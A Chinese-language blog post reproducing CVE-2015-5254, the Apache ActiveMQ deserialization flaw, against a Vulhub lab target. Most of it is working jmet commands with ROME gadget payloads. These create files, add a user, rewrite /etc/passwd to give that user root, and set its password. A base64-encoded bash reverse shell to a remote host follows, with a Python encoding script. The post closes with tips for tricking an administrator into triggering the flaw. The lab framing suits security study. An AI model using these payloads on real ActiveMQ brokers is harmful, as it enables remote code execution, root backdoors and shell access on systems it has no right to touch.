首页 > 其他分享 >CVE-2015-5254漏洞复现

CVE-2015-5254漏洞复现

时间:2023-04-24 22:48:01浏览次数:52  
标签:jmet 5254 61616 0.1 jar 漏洞 2015 172.18 CVE

1.漏洞介绍。

Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。Apache ActiveMQ 5.13.0之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的 Java 消息服务(JMS)ObjectMessage 对象利用该漏洞执行任意代码。

2.环境介绍。

复现环境采用kali搭建Vulhub。

靶机:172.18.0.1:8161

环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。

3.漏洞利用。

3.1漏洞利用过程简述。

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

3.2具体过程。

(1)访问web界面并进行登录。

账号:admin
密码:admin

 (2)使用jmet进行漏洞利用。

首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
//下载jar文件
mkdir external
//创建external文件夹

执行命令:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 172.18.0.1 61616
//创建/tmp/success,同理可进行其他命令的操作

我们返回管理界面,发现添加了一个名为事件的队列。

 点击进入

 此时已经触发命令执行,我们进入dockor查看

docker ps

docker exec -it b189872443f5  /bin/bash

 可以发现tmp目录已创建,进入发现sucess,漏洞利用成功

创建一个用户

 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 Tom" -Yp ROME  172.18.0.1  61616

触发条件和之前相同,在管理界面去点击队列

 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/Tom:x:0/g" /etc/passwd" -Yp ROME   172.18.0.1  61616
//修改权限
 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "Tom:sd123456" | chpasswd" -Yp ROME   172.18.0.1   61616
//添加密码

至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接

或者将命令换为反弹shell再利用:

bash -i >& /dev/tcp/172.18.0.1/777 0>&1

使用base64编码payload绕过Java机制

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx

附上base64编码脚本

import base64

# Sample string to encode
string = "bash -i >& /dev/tcp/172.18.0.1/777 0>&1"

# Encoding the string
encoded_string = base64.b64encode(string.encode('utf-8'))

# Printing the encoded string
print(encoded_string.decode('utf-8'))

构建pyload

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 172.18.0.1 61616

使用nc监听端口

 反弹shell成功

 值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

 

标签:jmet,5254,61616,0.1,jar,漏洞,2015,172.18,CVE
From: https://www.cnblogs.com/yaolingyu/p/17351202.html

相关文章

  • P2671 [NOIP2015 普及组] 求和
    here看到这个条件,想到等差数列,于是假设了1,3,5位置上的颜色一样时,总和是多少,然后发现是:(1+1+3+5)f(1)+(1+3+3+5)f(3)+(1+3+5+5)f(5)现在看的很清楚了,有两种可能:(i+配对的数之和+i)f(i)或者(i*配对的数的个数+配对的数之和)f(i)。看看样例1,发现后......
  • Wc2015……酱油记?
    怎么看大家都在写酱油记我也来水一发算了==宿舍网络不大好==加上患上了不治之症扁桃腺发炎啥的==这篇算是之后没事闲的补一发了吧……===============================DAY0====================================凌晨一点的火车QAQ大东北离杭州真是远QAQ等车时群里(不要问我......
  • Solution Set - APIO2015
    目录A.巴厘岛的雕塑B.雅加达的摩天楼C.巴邻旁之桥A巴厘岛的雕塑\(n\)个数分为若干组,组数不少于\(a\)且不多于\(b\)。最小化各组和的\(OR\)值。\(n\le2000\),\(1=a\leb\len\)或\(n\le100\),\(1\lea\leb\)。key:贪心,DP按位处理,从高到低依次尝试......
  • Oracle MySQL Server 拒绝服务漏洞(CVE-2023-21912) 修复
    CVE编号公告标题和摘要最高严重等级受影响的软件CVE-2023-21912OracleMySQLServer拒绝服务漏洞未经身份验证的远程攻击者可通过MySQL协议网络访问MySQLServer,成功利用此漏洞可导致目标MySQLServer挂起或频繁重复崩溃,造成拒绝服务攻击重要MySQLServer<=5.7.41......
  • P2661 [NOIP2015 提高组] 信息传递-拓扑排序+DFS深度优先遍历
    题目描述有 n 个同学(编号为 1 到 n )正在玩一个信息传递的游戏。在游戏里每人都有一个固定的信息传递对象,其中,编号为 i 的同学的信息传递对象是编号为 Ti​ 的同学。游戏开始时,每人都只知道自己的生日。之后每一轮中,所有人会同时将自己当前所知的生日信息告诉各自的信......
  • Apache Tomcat拒绝服务漏洞 CVE-2022-29885
    【预警类型】中危预警【预警内容】ApacheTomcat拒绝服务漏洞 CVE-2022-29885漏洞编号:CVE-2022-29885一、漏洞概述2022年7月2日,安全团队监测到一则ApacheTomcat 拒绝服务漏洞的信息。该漏洞是由于Tomcat开启集群配置中存在缺陷,攻击者可利用该漏洞在未权限的情况下,构造恶意......
  • P2680 NOIP2015 提高组 运输计划
    P2680NOIP2015提高组运输计划最小化最长的路径,考虑二分答案。问题转化成检验删去一条边的边权后,最长路径权值能否不超过\(x\)。考虑没删边权时,原先那些不超过\(x\)的路径,删去边权后肯定不会影响,直接忽略。考虑原先比\(x\)长的那些路径。我们期望删边权后这些路径全部......
  • 所有可用的和最新的CVE及其PoC合集
    所有可用的和最新的CVE及其PoC合集涉及到的CVE从1999年到2023年,共计75368个CVE.从cvelist中收集CVE的详细信息按年份拆分CVE。使用2种技术查找每个CVE的PoC:   引用       收集每个CVE的引用。       使用ffuf和关键词列表检查它们是否指向......
  • P6134 [JSOI2015]最小表示
    P6134[JSOI2015]最小表示思:有向无环图,想到拓扑排序。逆序枚举,因为排序后下标小的点用到它前面的点的联通性。对其连接的点按照拓扑序由小到大进行排序(靠前的点可以连接的点多,那么可以删的边数也变多。其余套路与可达性统计类似,注意代码细节。#include<bits/stdc++.h>......
  • 【CVE-2020-1938】Ghostcat 漏洞复现
    0x00漏洞概述Java是目前Web开发中主流的编程语言,而Tomcat是当前流行的Java中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。Ghostcat是由长亭发现的存在于Tomcat中的漏洞,由于TomcatAJP协议设计上存在缺陷,攻击者通过TomcatAJPConnect......